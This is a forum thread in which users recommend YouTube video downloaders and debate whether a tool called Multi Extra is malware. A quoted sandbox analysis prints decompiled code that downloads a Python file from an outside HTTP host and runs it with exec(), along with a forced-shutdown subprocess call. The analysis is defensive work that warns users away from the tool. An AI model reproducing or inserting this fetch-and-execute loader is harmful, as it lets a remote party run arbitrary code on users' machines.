2020-02-17 03:14:05

Hello there everybody!

Does anyone have any good recommendations for methods to download videos from Youtube?

I used to use one of a number of extentions from Firefox to do the job but none of them seem to work anymore. I've also heard there's way to download videos using VLC, but I haven't been able to figure it out one way or another.

Any help you could give would be awesome. Thank you!

2020-02-17 03:17:45

I love youtube-dl, however I'm sure someone will give you an easier solution

2020-02-17 09:36:16

youtube dl is the best

Ladies and gentlemen, this is your captain speaking. We have a small problem. All four engines have stopped. We are doing our damnedest to get them going again. I trust you are not in too much distress.

2020-02-17 10:57:29

Pontes media downloader works for me as well.

Feel free to follow me on Twitter @thecoolgamer4 and subscribe to my Youtube channel

2020-02-17 13:02:07

Hi there

When you're watching a video, hit alt+D to go to your address bar, and add the dl after the www.

2020-02-17 18:58:00

Can I use the iPad for downloading the videos too?

2020-02-17 21:17:57

with utube dl only with a jailbreak

Ladies and gentlemen, this is your captain speaking. We have a small problem. All four engines have stopped. We are doing our damnedest to get them going again. I trust you are not in too much distress.

2020-02-17 21:24:56

Have to agree on pontes here.
Yes it's essentially a frontend for other dl tools, but by god it's a good one.

With our dreaming and singing, Ceaseless and sorrowless we! The glory about us clinging Of the glorious futures we see,
Our souls with high music ringing; O men! It must ever be
That we dwell in our dreaming and singing, A little apart from ye. (Arthur O'Shaughnessy 1873.)

2020-02-17 22:41:54 (edited by Pineapple Pizza 2020-02-17 22:44:23)

The  issue  I have  is the fact that it only converts into 128K bps even when using wav. I have found no way to change this and I have looked.  If this one thing was fixed,  you can be sure I would be using it.  It makes video downloading ridiculously easy.

I would rather listen to someone who can actually play the harmonica than someone who somehow managed to lose seven of them. Me, 2019.

2020-02-17 23:49:40

Are your recommendations for the computer or something else? Because I'm trying to find a way to do it via my computer. I'm using a windows 10, mostly with google chrome, and with NVDA screen reader.

2020-02-17 23:55:25

Okay, I checked out both options. I don't know anything about Python, so I'm not sure if I can use that, and my anti-virus program keeps flagging Pontes media downloader works for me as well. as containing tons of trogans. So I'm not sure what to do. How would one set up Youtube dl?

2020-02-18 00:24:12

I use
ytmp3.cc
They work like a dream. You can use 4K vido downloader, and I'm not sure if SongR still works.
RHTH

You ain't done nothin' if you ain't been cancelled
_____
I'm working on a playthrough series of the space 4X game Aurora4x. Find it here

2020-02-18 04:44:03

Thing is, I'm not looking to download them as mpe. I'm hoping to download them as mp4 or a video format that I can put on my IPhone.

2020-02-18 11:27:22

See post #5. That's why I was trying to explain to you.

2020-02-18 11:32:36

ytmp3 you can interthe format you wanna download it in.

You ain't done nothin' if you ain't been cancelled
_____
I'm working on a playthrough series of the space 4X game Aurora4x. Find it here

2020-02-18 12:35:00

Hi.

Youtube-dl is easy to use, download the exe program, put it in the place you want to download the videos to, then go to command line and cd into that folder.

Here's an example: cd downloads.

Press enter, now you're in the downloads folder, type the following, youtube-dl space and paste the URL of the Video and press enter.

You can do things with templats but i don't know much about that and you can download a thing to convert files to other formats but someone else will have to help you with that.

I'm gone for real :)

2020-02-18 20:43:48 (edited by turtlepower17 2020-02-18 20:49:57)

Quite some time ago, someone on this forum uploaded some batch files which interface with youtubeDL. It comes with a text document called links.txt which you paste any amount of URL's into that you want, each on a separate line. Then, depending on which format you want, you run the corresponding file (always as an administrator, it never worked for me otherwise) so, if you just want video, you run Youtube2video.bat. I can upload that if the person doesn't mind, I honestly don't remember who it was or if they're still posting here, but I figured I'd ask first in case they've decided they don't want those files floating around for some reason. I love this method because it really couldn't get much simpler.

I do still use Pontes on occasion, but the only thing that does that this doesn't is tag your files, so that's why I'll choose that method on occasion if I'm lazy and don't want to manually add ID3 tags myself.

The glass is neither half empty nor half full. It's just holding half the amount it can potentially hold.

2020-02-19 16:05:40

use multi extra its a good youtube downloader

thanks and regards.
Krantikari
visit my Youtube channel for technical related stuff

2020-02-19 17:42:34

No, I really wouldn't. It's a virus.

I would rather listen to someone who can actually play the harmonica than someone who somehow managed to lose seven of them. Me, 2019.

2020-02-19 22:34:41

multi extra damaged my computer i needet to reinstall windows after that

2020-02-20 18:00:44 (edited by Aloy 2020-02-20 18:02:08)

YouTube dl is the best
i had created a cmd batch files for downloading playlists and single videos music et using youtube dlc
through promts, like when you click on the script it will ask for the link of the video/playlist channel and also it will jenerate the log and avoids downloading multiple files,

2020-02-21 17:06:50

I am using multi extra since  it was published.
it had not harmed my computer.
and about the virus warning its just a false warning and now it has been fixed by the developer.

thanks and regards.
Krantikari
visit my Youtube channel for technical related stuff

2020-02-21 17:29:22 (edited by Pineapple Pizza 2020-02-21 17:31:10)

Krantikari, have you read any of this? This is from the topic that was made about this a long time ago.

Really look. You don't just fix, something like this. Also remember blind extra, which was a virus, no question about it.Posts start.

OK, OK. Everyone cool it. As we speak I am sandboxing the program and am going to post my findings once I have unpacked the setup files and can get access to the actual executable (the setup itself is not harmful, according to virus total). Analyzing the installed program in my sandbox, I notice many things off of the bat, one of which is notable -- this program is written in Python! Python 3.6, to be precise. Extracting the setup file ("installing" it in my sandbox) and extracting the .exe file, I see the pyinstaller archive files, and now I have the compiled python bytecode. At this stage decompilation is trivial: I see that the app has the standard python stdlib, chardot, and this file called... MEX.pyc. Mmm... and what could this be?
Oh dear! Some suspicious code! Looky, friends:
import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettext
from html2text import html2text
from playsound import playsound
import encodings.idna
get = os.environ['temp']
item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')
exec(open('MAX.py').read())
Looking at this "max.py" file...
First, it imports its "needed" modules. Then... there's this exception handler that gets it to try to remove itself from the file system. Should that fail, it does nothing.
Next, it trys to change to c:\ProgramData\MultiExtra. Not sue how that'll work since the app doesn't create it (maybe the setup does?). It then creates an appdata folder and creates its multiextra.ini file.
The worying thing however is how many downloads this thing does. There's another download on line 92 (the rest of the above discussion is just it doing its normal configuration) that it reads from using the URL http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Note the lack of 'https'.) This file... doesn't seem to contain anything, if I browse to it. It also links to NVDA as well. (Note that this is the "actual" NVDA file, and is not malicious -- just version 2018.1.1, but it replaces that with the latest version on softpedia for some reason.)
We're not done though! This program also seems to do some very disturbing subprocess calls. In particular:
Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)
It also runs command prompt:
Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)
And this...
Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)
And, of course, the end of the application, when it try's to taskkill itself instead of exiting properly:
Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)
Some things to note with these subprocess calls:
* Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info): This one isn't harmful -- unless, of course, he sets it to something like csrss's PID or another critical system process if he's able to gain that level of privilege.
* Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info): this one is... entirely unnecessary and pointless. I don't get it. I don't really get what its trying to do (I think "MultiExtraDownloads\Apps" is some kind of executable or batch script or something like that).
* Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info): -s shuts down the computer, only; -t (/t) ells it to do an immediate shutdown.
There are also some other os.remove calls that are in here. I'd be happy to fully decompile all the code and upload it somewhere for people like cartertemm to go over and review.
As for the "this program steels files" accusation, I'm checking on that.
OK, I can't confirm that either way. It doesn't use shutil or networking -- that I can see anyway, other than urllib. It doesn't use shutil so it can't do any bulk copys, and it doesn't use os.rename, os.renames, or os.link/os.unlink, nor does it contact any remote servers via obscure protocols. Not that I can find, at any rate. So I think that for now we can discard that accusation (though don't bank on that, I didn't decompile the entire program tree).
In sum: the program does some disturbing activity which I'd like others to take up (I'm not going to read the entire program). On the surface it is *not* harmful. I repeat: it is *not* harmful on the surface. However, I would hold off accusations and destructive comments until people like cartertemm (and even myself if I decide to dive into that mess of code) can fully analyze it. In the meantime, I would hold off on using it lest you get hit by something we have not found.

Lucas1853
2019-05-20 11:50 am
Altered being
The thing is, it doesn't matter if MAX.py is the most harmless program ever made right now. Fact is, it could become devistatingly harmful, because it's downloading from an external source, I presume every time you open the app. Do not trust this program.

2019-05-20 11:54 am
hero caller
Blind Extra did something similar I believe. It downloaded then executed some Python file that could do just about anything...

Ethin
2019-05-20 12:55 pm
Stellar beater
39-41, exactly why I recommended people don't use it until we can examine it further. The fact that it immediately downloads code when you run it is incredibly suspicious and brings into question what the developer is trying to do. All three of you are correct in saying that, since the code is hosted on a server it could be changed. The fact that it calls exec and not some kind of sanatized eval (I don't get why you'd use eval or exec, period; its dangerous) makes it a threat. The code can do literally anything it likes so long as its valid syntax.

jaybird
2019-05-21 3:36 pm
Swamp machine
Guys, it's the principle of the thing. If I understand post 36 correctly, pretty much the first thing this program does when you run it is to download another program. That's bad enough, but again if I understand correctly, it then does absolutely no checks of what it just downloaded. It doesn't do any digital signature or hashing checks, it doesn't look at the downloaded program in any way. In fact, it doesn't even do so much as to check that what it received is, in fact, a Python program and not, say, an error document or some unrelated file. It just blindly executes it anyway. This is bad on so many levels it's not even funny. Putting aside for the moment the obvious scenario where the developer has put out this really nice program, then later decides to modify the downloaded program file to do something nasty, let's look at something even worse. Suppose someone else knows how this program works, and wants to have a little fun at the developer's expense. So they hack into the developer's website and upload their own program in place of the correct one. So now, since the software does no integrity checks whatsoever, it downloads the new Python code uploaded by the hacker instead of the intended Python code, and this new code might do absolutely anything!
This is extremely dangerous! It might be just fine today, but then tomorrow, with absolutely no change to the program you run, it turns nasty. Nobody, and I mean absolutely nobody! can review this software anywhere at all, on Youtube, on a blog, etc. Since it downloads Python code at startup, nobody can know for certain what it will do. For this reason, nobody's review can be trusted.

2020-02-21 19:00:55

Why do You guys advise youtube-dl to people who are unaware of programing. its'a python lib.

Anyway i can suggest 4k downloader and pontes boath are fine.